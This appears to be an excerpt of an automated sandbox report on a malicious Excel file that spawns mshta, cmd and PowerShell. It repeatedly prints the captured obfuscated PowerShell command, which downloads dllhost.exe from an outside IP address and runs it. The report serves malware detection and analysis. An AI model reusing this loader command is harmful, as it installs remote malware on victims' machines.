Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\dllhost.exe Section loaded: dwmapi.dll
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdbhP source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.pdb source: powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: .pdb- source: powershell.exe, 00000007.00000002.450490527.000000001C26D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dllhost.exe, 0000000B.00000003.457458301.0000000003900000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.459419334.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492203935.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000016.00000003.492301433.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: .pdb) source: powershell.exe, 00000011.00000002.482289693.000000001AC63000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdb source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.pdbhP source: powershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp
Source: B8230000.0.dr Initial sample: OLE indicators vbamacros = False
Source: SYSN ORDER.xls Initial sample: OLE indicators encrypted = True

Data Obfuscation
barindex
PowerShell case anomaly found
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
Suspicious command line found
